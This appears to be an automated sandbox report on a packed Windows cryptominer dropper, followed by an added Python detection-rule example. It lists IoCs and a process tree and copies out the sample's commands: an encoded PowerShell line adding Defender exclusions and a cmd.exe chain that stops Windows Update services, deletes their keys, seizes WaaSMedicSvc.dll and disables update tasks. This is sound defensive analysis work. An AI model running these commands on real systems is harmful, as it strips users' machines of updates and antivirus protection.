Analysis

- max time kernel: 315s
- max time network: 318s
- platform: windows10-1703_x64
- resource: win10-20220718-en
- resource tags: arch:x64, arch:x86, image:win10-20220718-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 02-08-2022 22:19
Behavioral task: behavioral1
- Sample: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe
- Resource: win7-20220718-en
General

- Target: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe
- Size: 7.2MB
- MD5: 39a2104f5c1096d1c9481cbf5203a820
- SHA1: 17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34
- SHA256: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc
- SHA512: 7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52
Malware Config
Signatures
Modifies security service (2 TTPs, 5 IoCs)
Process: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
Processes: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe, updater.exe
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (updater.exe)

XMRig Miner payload (6 IoCs)
Yara rule: xmrig. All hits are in PID 3256 (explorer.exe, the SetThreadContext target listed below); 0x140000000 is the default image base of a 64-bit PE, so the region is a separately mapped payload rather than explorer's own image.
- behavioral2/memory/3256-464-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/3256-465-0x000000014036EAC4-mapping.dmp
- behavioral2/memory/3256-466-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/3256-467-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/3256-478-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/3256-483-0x0000000140000000-0x0000000140809000-memory.dmp

Drops file in Drivers directory (2 IoCs)
Processes: conhost.exe, conhost.exe
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (conhost.exe)
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (conhost.exe)

Executes dropped EXE (1 IoC)
- PID 492 updater.exe

Possible privilege escalation attempt (4 IoCs)
- PID 3996 takeown.exe
- PID 3760 icacls.exe
- PID 3720 takeown.exe
- PID 4084 icacls.exe

Stops running service(s) (3 TTPs)

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe, updater.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (updater.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (updater.exe)

Modifies file permissions (1 TTP, 4 IoCs)
- PID 3996 takeown.exe
- PID 3760 icacls.exe
- PID 3720 takeown.exe
- PID 4084 icacls.exe
Themida packer (8 IoCs)
Yara rule: themida. The rule fires on the original sample (PID 3896), on the dropped copy at C:\Program Files\Google\Chrome\updater.exe, and on that copy once running (PID 492).
- behavioral2/memory/3896-114-0x0000000000400000-0x00000000010B6000-memory.dmp
- behavioral2/memory/3896-116-0x0000000000400000-0x00000000010B6000-memory.dmp
- behavioral2/memory/3896-117-0x0000000000400000-0x00000000010B6000-memory.dmp
- C:\Program Files\Google\Chrome\updater.exe
- C:\Program Files\Google\Chrome\updater.exe
- behavioral2/memory/492-268-0x0000000000400000-0x00000000010B6000-memory.dmp
- behavioral2/memory/492-269-0x0000000000400000-0x00000000010B6000-memory.dmp
- behavioral2/memory/492-271-0x0000000000400000-0x00000000010B6000-memory.dmp

Checks whether UAC is enabled (2 IoCs)
Processes: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe, updater.exe
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (updater.exe)

Drops file in System32 directory (4 IoCs)
Processes: powershell.EXE, powershell.exe, conhost.exe
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
- PID 3896 b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe
- PID 492 updater.exe

Suspicious use of SetThreadContext (1 IoC)
- PID 3948 conhost.exe set thread context of PID 3256 explorer.exe (the process in which the XMRig yara rule fires)

Drops file in Program Files directory (3 IoCs)
Processes: powershell.exe, conhost.exe
- File created: C:\Program Files\Google\Chrome\updater.exe (powershell.exe)
- File opened for modification: C:\Program Files\Google\Chrome\updater.ex (powershell.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (conhost.exe)

Launches sc.exe (10 IoCs)
sc.exe is a Windows utility to control services on the system.
- PID 1620 sc.exe
- PID 1272 sc.exe
- PID 200 sc.exe
- PID 2560 sc.exe
- PID 3788 sc.exe
- PID 2796 sc.exe
- PID 1184 sc.exe
- PID 2216 sc.exe
- PID 3760 sc.exe
- PID 208 sc.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.exe, powershell.EXE, conhost.exe
All paths below are relative to \REGISTRY\USER\.DEFAULT\Software\.
- Key created: Microsoft\SystemCertificates\Root (powershell.exe)
- Key created: Microsoft\SystemCertificates\TrustedPeople (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (conhost.exe)
- Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Key created: Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (conhost.exe)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (conhost.exe)
- Key created: Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: Microsoft\SystemCertificates\Root\CRLs (powershell.EXE)
- Key created: Microsoft\SystemCertificates\trust (powershell.EXE)
- Key created: Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Set value (data): Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (powershell.exe)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.EXE)
- Key created: Microsoft\SystemCertificates\CA\CRLs (powershell.EXE)
- Key created: Microsoft\SystemCertificates\Disallowed (powershell.EXE)
- Key created: Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: Microsoft\SystemCertificates\CA (powershell.EXE)
- Key created: Microsoft\SystemCertificates\CA\Certificates (powershell.EXE)
- Key created: Microsoft\SystemCertificates\trust\Certificates (powershell.EXE)
- Key created: Microsoft\SystemCertificates\trust\CTLs (powershell.EXE)
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.EXE)
- Key created: Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: Microsoft\SystemCertificates\trust\CRLs (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Key created: Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\CA (powershell.EXE)
- Key created: Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
- Key created: Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.EXE)
- Key created: Microsoft\SystemCertificates\Disallowed\Certificates (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\trust (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (conhost.exe)
- Key created: Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created: Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.EXE)
- Key created: Microsoft\SystemCertificates\Root\CTLs (powershell.EXE)
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
- Key created: Microsoft\SystemCertificates\Root (powershell.EXE)
- Key created: Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.EXE)
- Key created: Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.EXE)
Modifies registry key (1 TTP, 18 IoCs)
PIDs (all reg.exe): 3608, 420, 2952, 2800, 1892, 1892, 876, 1968, 3520, 2688, 2700, 1536, 496, 4048, 2560, 60, 3628, 3116
Suspicious behavior: EnumeratesProcesses (64 IoCs)
- PID 708 powershell.exe (3 entries)
- PID 2144 conhost.exe (1 entry)
- PID 3864 powershell.exe (3 entries)
- PID 1768 powershell.EXE (3 entries)
- PID 2148 powershell.exe (3 entries)
- PID 3948 conhost.exe (1 entry)
- PID 3256 explorer.exe (50 entries)

Suspicious behavior: LoadsDriver (1 IoC)
- PID 608 (no process name recorded)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe, powercfg.exe, conhost.exe, takeown.exe
- PID 708 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 164 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- PID 2136 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- PID 2144 conhost.exe: SeDebugPrivilege
- PID 3004 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- PID 1916 powercfg.exe: SeShutdownPrivilege, SeCreatePagefilePrivilege
- PID 3996 takeown.exe: SeTakeOwnershipPrivilege
- PID 3864 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege
(Privileges 33 to 36 are reported by LUID only.)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe, conhost.exe, cmd.exe, cmd.exe
Each entry is "parent wrote to memory of child"; the pairs mirror the parent/child links in the process tree below (a parent writes into a child it has just created), so this list is primarily a lineage record. The injection indicator for the miner is the SetThreadContext entry above, not this list.
- PID 3896 b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe -> 2144 conhost.exe (3 entries)
- PID 2144 conhost.exe -> 708 powershell.exe (2 entries)
- PID 2144 conhost.exe -> 2428 cmd.exe (2 entries)
- PID 2144 conhost.exe -> 1384 cmd.exe (2 entries)
- PID 2428 cmd.exe -> 200 sc.exe (2 entries)
- PID 1384 cmd.exe -> 164 powercfg.exe (2 entries)
- PID 1384 cmd.exe -> 2136 powercfg.exe (2 entries)
- PID 2428 cmd.exe -> 2560 sc.exe (2 entries)
- PID 1384 cmd.exe -> 3004 powercfg.exe (2 entries)
- PID 2428 cmd.exe -> 2216 sc.exe (2 entries)
- PID 1384 cmd.exe -> 1916 powercfg.exe (2 entries)
- PID 2428 cmd.exe -> 3788 sc.exe (2 entries)
- PID 2428 cmd.exe -> 2796 sc.exe (2 entries)
- PID 2428 cmd.exe -> 1892 reg.exe (2 entries)
- PID 2428 cmd.exe -> 3520 reg.exe (2 entries)
- PID 2428 cmd.exe -> 876 reg.exe (2 entries)
- PID 2428 cmd.exe -> 496 reg.exe (2 entries)
- PID 2428 cmd.exe -> 1968 reg.exe (2 entries)
- PID 2428 cmd.exe -> 3996 takeown.exe (2 entries)
- PID 2428 cmd.exe -> 3760 icacls.exe (2 entries)
- PID 2144 conhost.exe -> 3864 powershell.exe (2 entries)
- PID 2428 cmd.exe -> 3608 reg.exe (2 entries)
- PID 2428 cmd.exe -> 420 reg.exe (2 entries)
- PID 2428 cmd.exe -> 4048 reg.exe (2 entries)
- PID 2428 cmd.exe -> 60 reg.exe (2 entries)
- PID 2428 cmd.exe -> 1620 schtasks.exe (2 entries)
- PID 2428 cmd.exe -> 4040 schtasks.exe (2 entries)
- PID 2428 cmd.exe -> 3744 schtasks.exe (2 entries)
- PID 2428 cmd.exe -> 1416 schtasks.exe (2 entries)
- PID 2428 cmd.exe -> 2212 schtasks.exe (2 entries)
- PID 2428 cmd.exe -> 2204 schtasks.exe (2 entries)
- PID 2428 cmd.exe -> 2136 schtasks.exe (1 entry; list capped at 64)
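The signatures above (Launches sc.exe, Modifies registry key, Modifies file permissions, Suspicious use of AdjustPrivilegeToken) are all produced by one cmd.exe command line plus one encoded PowerShell command, and that is the level at which a detection engineer would want to match them. The following is an added example, not part of the sandbox report and not code from the sample: a small rule set over process-creation records. The EVENTS list is constructed (the pid/ppid/image columns are illustrative); the command lines marked "from report" are copied verbatim from the process tree further down, and the two marked "constructed benign" show the rules staying quiet on ordinary administration.

```python
"""Process-creation rules for the update-killing / Defender-exclusion chain.

Added example; it is not part of the sandbox report and not code from the
sample. EVENTS is a constructed record list (pid/ppid/image are illustrative);
the command lines marked 'from report' are copied from the report's process
tree, and the two marked 'constructed benign' show the rules staying quiet.
"""
import base64
import re

# Services the sample stops, and whose Services\<name> keys it deletes.
SVC = r"(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"

RULES = {
    "stop_update_service":
        rf"\bsc(?:\.exe)?\s+stop\s+{SVC}\b",
    "delete_update_service_key":
        rf"\breg(?:\.exe)?\s+delete\s+HKLM\\SYSTEM\\CurrentControlSet\\Services\\{SVC}\s+/f\b",
    # 'rename' is a cmd builtin: it never becomes its own process, so the only
    # place it can be matched is the parent cmd.exe command line.
    "waasmedic_dll_tamper":
        r"\b(?:takeown|icacls|rename)\b[^&]*WaaSMedicSvc\.dll",
    "wu_policy_noautoupdate":
        r"\breg(?:\.exe)?\s+add\s+HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU"
        r"\s+/v\s+NoAutoUpdate\s+/d\s+1\b",
    "disable_update_task":
        r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"\\Microsoft\\Windows\\'
        r'(?:WindowsUpdate|UpdateOrchestrator)\\[^"]+"\s+/DISABLE\b',
    "powercfg_no_sleep":
        r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b",
    # Only visible once -EncodedCommand is decoded (see expand_encoded).
    "defender_exclusion_systemdrive":
        r"Add-MpPreference\b[^;]*-ExclusionPath\b[^;]*\$env:SystemDrive",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in RULES.items()}

# -EncodedCommand (and its short aliases) carries base64 of UTF-16LE text.
ENC_RE = re.compile(r'-(?:EncodedCommand|enc|ec|e)\b\s+"?([A-Za-z0-9+/=]{16,})"?', re.IGNORECASE)


def expand_encoded(cmdline):
    """Return cmdline plus the decoded text of every encoded payload it carries."""
    decoded = []
    for m in ENC_RE.finditer(cmdline):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real payload; match on the visible text only
    return "\n".join([cmdline, *decoded])


def match_rules(cmdline):
    """Names of the rules that fire on one process-creation command line."""
    text = expand_encoded(cmdline)
    return [name for name, rx in COMPILED.items() if rx.search(text)]


def triage(events):
    """Map pid -> firing rules and roll them up: three or more distinct rules
    across the event set is treated as the tampering chain rather than noise."""
    hits = {}
    for pid, _ppid, _image, cmdline in events:
        fired = match_rules(cmdline)
        if fired:
            hits[pid] = fired
    distinct = {name for fired in hits.values() for name in fired}
    if len(distinct) >= 3:
        verdict = "update-tampering chain"
    elif distinct:
        verdict = "isolated hits"
    else:
        verdict = "clean"
    return hits, verdict


DEFENDER_EXCLUSION_B64 = (  # from report (PID 708 powershell.exe)
    "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="
)

UPDATE_KILL_CHAIN = (  # from report (PID 2428 cmd.exe); '&' runs every step even if one fails
    r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll'
    r' & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE'
)

EVENTS = [  # (pid, ppid, image, command line)
    (2428, 2144, "cmd.exe", UPDATE_KILL_CHAIN),  # from report
    (708, 2144, "powershell.exe",  # from report
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + DEFENDER_EXCLUSION_B64 + '"'),
    (1384, 2144, "cmd.exe",  # from report
     r'"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0'),
    (4242, 1000, "cmd.exe", r'"C:\Windows\System32\cmd.exe" /c sc query wuauserv'),  # constructed benign
    (4243, 1000, "powershell.exe", "powershell.exe -NoProfile -Command Get-MpPreference"),  # constructed benign
]

if __name__ == "__main__":
    hits, verdict = triage(EVENTS)
    for pid, fired in hits.items():
        print(pid, ", ".join(fired))
    print("verdict:", verdict)
```

The rules match on the cmd.exe command line rather than on the sc.exe, reg.exe and schtasks.exe children because the children each carry one fragment, while the parent carries the whole chain in one record; it also exposes the `rename` step, which is a cmd builtin and so never appears as a process of its own.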
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
